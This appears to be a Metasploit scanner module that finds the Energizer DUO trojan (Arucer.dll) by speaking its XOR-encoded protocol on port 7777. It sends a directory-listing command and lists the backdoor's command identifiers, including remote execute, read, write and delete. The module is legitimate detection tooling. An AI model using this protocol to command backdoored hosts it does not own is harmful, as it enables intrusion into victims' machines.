##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
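class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Scanner
  include Msf::Auxiliary::Report

  # Single-byte XOR key applied to every byte on the wire, in both directions.
  # XOR is its own inverse, so trojan_encode is used to decode replies as well.
  XOR_KEY = 0xE5

  # Command identifiers understood by the backdoor (Arucer.dll). Each is a
  # 38-character GUID string that is sent NUL-terminated, which is why the
  # length prefix in trojan_command is 0x27 (39).
  COMMAND_IDS = {
    :exec    => "{8AF1C164-EBD6-4b2b-BC1F-64674E98A710}",
    :dir     => "{0174D2FC-7CB6-4a22-87C7-7BB72A32F19F}",
    :write   => "{98D958FC-D0A2-4f1c-B841-232AB357E7C8}",
    :read    => "{F6C43E1A-1551-4000-A483-C361969AEC41}",
    :nop     => "{783EACBF-EF8B-498e-A059-F0B5BD12641E}",
    :find    => "{EA7A2EB7-1E49-4d5f-B4D8-D6645B7440E3}",
    :yes     => "{E2AC5089-3820-43fe-8A4D-A7028FAD8C28}",
    :runonce => "{384EBE2C-F9EA-4f6b-94EF-C9D2DA58FD13}",
    :delete  => "{4F4F0D88-E715-4b1f-B311-61E530C2C8FC}"
  }.freeze

  # Upper bound on the directory-listing payload we are willing to read back.
  # The 4-byte little-endian length prefix is controlled by the remote host,
  # so an unrelated (or hostile) listener on port 7777 could otherwise make the
  # scanner try to buffer up to 4 GiB per target.
  MAX_LISTING_BYTES = 1024 * 1024

  def initialize
    super(
      'Name' => 'Energizer DUO Trojan Scanner',
      'Description' => 'Detect instances of the Energizer DUO trojan horse software on port 7777',
      'Author' => 'hdm',
      'References' =>
        [
          ['CVE', '2010-0103'],
          ['OSVDB', '62782'],
          ['US-CERT-VU', '154421']
        ],
      'License' => MSF_LICENSE
    )

    register_options(
      [
        Opt::RPORT(7777),
      ])
  end

  # XOR every byte of str with XOR_KEY.
  #
  # Symmetric: the same call encodes outbound frames and decodes inbound ones.
  #
  # @param str [String] raw bytes
  # @return [String] transformed bytes, same length as the input
  def trojan_encode(str)
    str.unpack("C*").map { |c| c ^ XOR_KEY }.pack("C*")
  end

  # Build an encoded command frame: 4-byte little-endian length (0x27), the
  # command GUID, then a NUL terminator.
  #
  # @param cmd [Symbol] one of the keys of COMMAND_IDS
  # @return [String] encoded frame ready for sock.put
  # @raise [ArgumentError] for an unknown command symbol (previously an empty
  #   identifier was silently sent with a bogus length prefix)
  def trojan_command(cmd)
    cid = COMMAND_IDS.fetch(cmd) do
      raise ArgumentError, "unknown Energizer DUO command: #{cmd.inspect}"
    end

    trojan_encode(
      [0x27].pack("V") + cid + "\x00"
    )
  end

  # Split a decoded directory listing into [type, name] pairs.
  #
  # Entries are "|"-separated; an entry prefixed with "?1" is a directory
  # ("D", prefix stripped), anything else is reported as a file ("F").
  #
  # @param data [String] decoded listing as returned by the backdoor
  # @return [Array<Array(String, String)>]
  def parse_listing(data)
    data.split("|").map do |entry|
      if entry[0, 2] == "?1"
        ["D", entry[2..-1]]
      else
        ["F", entry]
      end
    end
  end

  # Probe a single host: send the :dir command for "C:\" and, if the reply
  # decodes into a listing, record the host as carrying the backdoor.
  #
  # All data read from the socket is untrusted; the length prefix is bounded
  # and short/absent replies are treated as "not the trojan" rather than
  # allowed to raise out of the scanner loop.
  #
  # @param ip [String] target address supplied by the Scanner mixin
  # @return [void]
  def run_host(ip)
    connect
    sock.put(trojan_command(:dir))
    sock.put(
      trojan_encode(
        [4].pack("V") + "C:\\\x00\x00"
      )
    )

    # The reply starts with a 4-byte XOR-encoded little-endian length.
    # get_once may return fewer bytes than asked for, so check the size too:
    # unpack("V") on a short string yields nil and the comparisons below
    # would raise.
    lbuff = sock.get_once(4, 5)
    if lbuff.nil? || lbuff.length < 4
      print_error("#{ip}:#{rport} UNKNOWN: No response to the directory listing request")
      return
    end

    len = trojan_encode(lbuff).unpack("V")[0]
    if len == 0 || len > MAX_LISTING_BYTES
      print_error("#{ip}:#{rport} UNKNOWN: Implausible listing length #{len}, not the Energizer DUO protocol")
      return
    end

    # A timed-out read returns nil; the original code passed that straight to
    # trojan_encode and crashed the run with NoMethodError.
    dbuff = sock.get_once(len, 30)
    if dbuff.nil?
      print_error("#{ip}:#{rport} UNKNOWN: No directory listing data received")
      return
    end

    files = parse_listing(trojan_encode(dbuff))

    # Required to prevent the server from spinning a loop
    sock.put(trojan_command(:nop))

    # files.inspect escapes the attacker-supplied names before they are printed
    # or stored, so terminal control characters in a listing are rendered inert.
    print_good("#{ip}:#{rport} FOUND: #{files.inspect}")
    # Add Vulnerability and Report
    report_vuln({
      :host => ip,
      :name => "Energizer DUO USB Battery Charger Software Arucer.dll Trojaned Distribution",
      :refs => self.references
    })
    report_note(
      :host => ip,
      :proto => 'tcp',
      :port => rport,
      :sname => "energizer_duo",
      :type => 'Energizer DUO Trojan',
      :data => files.inspect
    )
  rescue ::Interrupt
    raise $!
  rescue ::Rex::ConnectionError, ::IOError
    # Unreachable host or dropped connection: nothing to report for this target.
  ensure
    # Always release the socket; the original left it open on error paths.
    disconnect
  end
end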